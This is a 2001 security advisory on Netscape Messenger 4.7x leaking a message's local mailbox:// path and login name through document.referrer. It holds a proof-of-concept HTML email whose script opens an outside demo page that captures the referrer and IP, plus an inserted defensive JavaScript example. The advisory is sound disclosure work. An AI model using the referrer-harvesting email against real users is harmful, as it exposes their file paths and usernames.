Author : 3APA3A <3APA3A@security.nnov.ru>
Affected software : Netscape 4.7x All Platforms
Vendor : Netscape (IPlanet)
Risk : Low
Remotely Exploitable : Yes
Released : 30 May 2001
Vendor URL : http://www.netscape.com
SECURITY.NNOV advisories: http://www.security.nnov.ru/advisories
Background:
Netscape Messenger uses an internal protocol called mailbox://. The
format of a mailbox URI is
mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber
This URI contains the full path to the user's mailbox, which usually
contains the user's login name and, in the case of Windows 9x, the path
to the Netscape installation.
Problem:
It's possible to retrieve the mailbox:// URI of a message. This means
it's possible to retrieve the mailbox location, the user's system login
and in some cases the path to the Netscape installation.
Details:
When a link is invoked from a message, Netscape sets the
"document.referrer" property to the URI of the message containing this
link. JavaScript on the target page is able to retrieve this property
and pass it to any location together with the IP of the calling machine.
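Added example, not part of the original advisory and not Netscape code: it splits a mailbox:// URI of the form given under Background to show which local details a referrer of that kind carries, and sketches the client-side rule that avoids the disclosure (forward a referrer only when the source document has a network scheme). The function names, the http/https allow-list and the sample URI are assumptions constructed for illustration.

```javascript
// Assumed policy: only these source schemes may be forwarded as a referrer.
// Local schemes (mailbox:, file:, ...) describe the user's machine.
const NETWORK_SCHEMES = new Set(['http', 'https']);

// Return the lower-cased scheme of a URI, or null if it has none.
function schemeOf(uri) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(uri);
  return m ? m[1].toLowerCase() : null;
}

// Split a URI shaped like the advisory's template:
//   mailbox://full_path_to_user_folder?ID=...&number=...
// Returns null for any other scheme.
function parseMailboxUri(uri) {
  if (schemeOf(uri) !== 'mailbox') return null;
  const rest = uri.slice('mailbox:'.length).replace(/^\/\//, '');
  const q = rest.indexOf('?');
  const folderPath = q === -1 ? rest : rest.slice(0, q);
  const params = {};
  if (q !== -1) {
    for (const pair of rest.slice(q + 1).split('&')) {
      if (!pair) continue;
      const eq = pair.indexOf('=');
      const key = eq === -1 ? pair : pair.slice(0, eq);
      params[key] = eq === -1 ? '' : pair.slice(eq + 1);
    }
  }
  return { folderPath, params };
}

// Referrer a mail client should expose when a link in sourceUri is followed:
// the source URI for network documents, an empty string for local ones.
function referrerToSend(sourceUri) {
  return NETWORK_SCHEMES.has(schemeOf(sourceUri)) ? sourceUri : '';
}

// Constructed sample following the advisory's template (not a captured value).
const SAMPLE =
  'mailbox:///home/alice/nsmail/Inbox?ID=3B14A2F1%40example.org&number=4711';

const parsed = parseMailboxUri(SAMPLE);
console.log('folder path in referrer:', parsed.folderPath);
console.log('referrer under the assumed policy:', JSON.stringify(referrerToSend(SAMPLE)));
```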
Exploitation:
The simple message below forces Netscape Messenger to open a new window.
The target page will display your IP and document.referrer. If you read
this message with Netscape Messenger you can simply click the http://
reference below.
-=-=-=-=-=-=-=-=-=-
From: 3APA3A
To: 3APA3A
Subject: Test your Netscape
Content-Type: text/html
<html><script>
window.open('http://www.security.nnov.ru/files/nsdemo.asp');
</script></html>
-=-=-=-=-=-=-=-=-=-
Vendor:
Netscape was contacted on May 30, 2001 via
http://help.netscape.com/forms/bug-security.html
No feedback was given.